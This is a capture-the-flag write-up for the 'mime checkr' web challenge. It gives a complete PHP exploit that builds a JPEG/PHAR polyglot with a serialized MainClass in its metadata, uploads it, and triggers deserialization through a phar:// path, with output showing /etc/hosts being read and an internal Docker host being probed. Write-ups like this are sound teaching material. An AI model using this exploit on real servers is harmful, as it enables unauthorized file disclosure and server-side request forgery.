# mime checkr

> upload and check the mime type
>
> http://web1.ctf.nullcon.net/

We have a web page where we can upload an image (JPEG) and it's stored in `/uploads/<random>.jpeg`. There's a second page (http://web1.ctf.nullcon.net/getmime.php) where we can provide the path and the MIME type of the file is returned. After some digging, we found out that there's a backup of `getmime.php` on the server (http://web1.ctf.nullcon.net/getmime.bak) and we can fetch the PHP source code:
```php
<?php
 //error_reporting(-1);
 //ini_set('display_errors', 'On');
 
 class CurlClass{
     public function httpGet($url) {
     $ch = curl_init();
 
     curl_setopt($ch,CURLOPT_URL,$url);
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
 //  curl_setopt($ch,CURLOPT_HEADER, false); 
 
     $output=curl_exec($ch);
 
     curl_close($ch);
     return $output;
  }
 }
 
 
 class MainClass {
 
   public function __destruct() {
         $this->why =new CurlClass;
         echo $this->url;
         echo $this->why->httpGet($this->url);
   }
 }
 
 
 // Check if image file is a actual image or fake image
 if(isset($_POST["submit"])) {
     $check = getimagesize($_POST['name']);
     if($check !== false) {
         echo "File is an image - " . $check["mime"] . ".";
         $uploadOk = 1;
     } else {
         echo "File is not an image.";
         $uploadOk = 0;
     }
 }
 
 
 ?>
```
It's obvious that we need to send a serialized `MainClass` and somehow trigger the server to unserialize it. The problem is that `unserialize()` function is not used there, only `getimagesize()`. And then https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf comes into play. PHAR files can contain the serialized metadata. When a PHAR file is being accessed via `phar://` (e.g. by `file_exists()`), the metadata is deserialized. That's what we needed.  
We need to create a valid JPEG file, which has only JPEG header but is actually a PHAR file with serialized `MainClass` as a metadata and upload it. Then try to get its MIME type on `getmime.php` page (`phar://uploads/<random>.jpeg`). During deserialization, the `GET` request to `MainClass->url` will be sent (the URL can be `file://`). The following script exploits this vulnerability - triggers the server to fetch and display the resource from the URL given as a parameter:
```php
$jpeg_header_size =
 "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
 "\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
 "\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x15".
 "\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x05\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14".
 "\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01".
 "\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x03".
 "\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x11".
 "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
 "\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x01".
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x00".
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda".
 "\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x10\x1f\xff\xd9";
 $phar = new Phar('test.phar');
 $phar->startBuffering();
 $phar->addFromString('test.txt', 'text');
 $phar->setStub($jpeg_header_size . " __HALT_COMPILER(); ?>");
 
 class MainClass {}
 $object = new MainClass;
 $object->url = '' . $argv[1];
 $phar->setMetadata($object);
 $phar->stopBuffering();
 
 # Upload a fake PHAR
 $post = array('fileToUpload' => new CURLFile('test.phar','image/jpeg','test.jpeg'));
 $ch = curl_init('http://web1.ctf.nullcon.net/upload.php');
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $result=curl_exec($ch);
 curl_close($ch);
 
 # Extract the destination file name
 preg_match('/ ([0-9a-z]+.jpeg) /', $result, $m);
 $image = $m[1];
 echo $image . "\n";
 
 # Exploit
 $post = array('name' => 'phar://uploads/' . $image, 'submit' => '');
 $ch = curl_init('http://web1.ctf.nullcon.net/getmime.php');
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $result=curl_exec($ch);
 curl_close($ch);
 echo $result . "\n";
```
We can read any file on the server. After fetching several files, I fetched `/etc/hosts`:
```
$ php -d phar.readonly=false -f get_file.php file:///etc/hosts
d65341cbbe60bfd102a9b92108a920cb.jpeg
File is not an image.



file:///etc/hosts127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.18.0.3	d038b936b122
```
The last entry looks interesting. Docker usually assigns containers addresses from `172.18`. Unfortunately, the web page itself is hosted on `172.18.0.3`. Let's see other addresses - `172.18.0.1` (unfortunately the same web page) and `172.18.0.2` - bingo!
```
$ php -d phar.readonly=false -f get_file.php http://172.18.0.2
e27adb4fcfa0e647510f783ab51ba60b.jpeg
File is not an image.



http://172.18.0.2b'\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85'
```
It turned out that `b'\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85'` is string encoded using EBCDIC encoding (CP-1047 in particular), so let's decode it:
```python
b'\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85'.decode('cp1047')
u'Hello /fetch~%[]^@)(  me'
```
Next, let's send a `GET` request to `/fetch~%[]^@)(` (after urlencoding it):
```
$ php -d phar.readonly=false -f get_file.php 'http://172.18.0.2/fetch~%25%5B%5D%5E%40%29%28'
c7c75eab6a0ca662e310f7b21fd53272.jpeg
File is not an image.



http://172.18.0.2/fetch~%25%5B%5D%5E%40%29%28b'\xc6\x93\x81\x87\xc0\xd7\xc8\xd7m\xe2\xa3\x99\x85\x81\x94\xa2m\x81\x99\x85m\xa3\xf0\xf0m\xd4\x81\x89\x95\xe2\xa3\x99\x85\x81\x94\xf0\xd0'
```
Another encoded data, so let's decode it (again using CP-1047):
```python
b'\xc6\x93\x81\x87\xc0\xd7\xc8\xd7m\xe2\xa3\x99\x85\x81\x94\xa2m\x81\x99\x85m\xa3\xf0\xf0m\xd4\x81\x89\x95\xe2\xa3\x99\x85\x81\x94\xf0\xd0'.decode('cp1047')
u'Flag{PHP_Streams_are_t00_MainStream0}'
```
The flag is `hackim19{PHP_Streams_are_t00_MainStream0}`.